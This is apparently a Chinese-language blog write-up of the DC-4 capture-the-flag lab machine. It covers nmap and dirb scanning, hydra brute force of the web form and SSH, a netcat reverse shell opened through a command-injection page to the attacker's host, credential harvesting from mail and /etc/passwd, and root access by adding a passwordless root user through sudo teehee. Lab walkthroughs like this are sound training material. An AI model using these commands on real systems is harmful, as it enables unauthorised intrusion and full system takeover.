博客

DC-4攻略

信息收集

主机发现

nmap -sP 192.168.64.0/24 -oN nmap.sP  

发现目标主机ip为192.168.64.139

端口扫描

nmap -A 192.168.64.139 -p 1-65535 -oN nmap_A

发现80http 和22ssh

访问80

目录扫描

dirb http://192.168.64.139  

后台登录主页为http://192.168.64.139/index.php 

渗透

爆破web账密

发现以post方式传参到login.php

使用hydra爆破表单

hydra -l <用户名> -P <密码字典> <IP地址> <表单参数> <登录失败消息>
hydra -l admin -P pass 192.168.64.139 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" 

密码为happy

登录页面查看信息

发现页面中存在远程命令执行

远程命令执行反弹shell

bp抓包修改命令

nc 监听端口或发起tcp/udp连接
kali本地监听端口
nc -lvvp 8080
nc+192.168.64.131+8080+-e+/bin/bash         发起连接  空格用+代替

获得交互性shell

python -c 'import pty;pty.spawn("/bin/sh")'  获得交互性shell

查找信息

进入home中jim目录发现mbox权限奇怪 但是我们没权限进去
$ ls -l
ls -l
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7  2019 backups
-rw------- 1 jim jim  528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh


进入home中jim目录backups目录，发现old-passwords
推测他可能是记录的密码,保存为字典
查看用户
cat /etc/passwd
发现两个用户jim和sam
考虑ssh爆破

爆破ssh

hydra -l jim -P pass ssh://192.168.64.139 -v -f

jim密码为jibril04

ssh登录jim
ssh jim@192.168.64.138 

cat mbox
发现是root发的邮件，去var/mali看一眼
cd /var/mali
cat jim
获得用户Charles密码^xHhA&hvim0y

切换到Charles用户
su Charles   发现没有用户
考虑外国人喜欢首字母大写
su charles   成功

提权

发现可以免密sudo使用teehe
charles@dc-4:/var/mail$ sudo -l
sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

sudo提权

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  
建立无密码用户并给root权限

免密登录

su admin

cd /root
ls
cat flag.txt  通关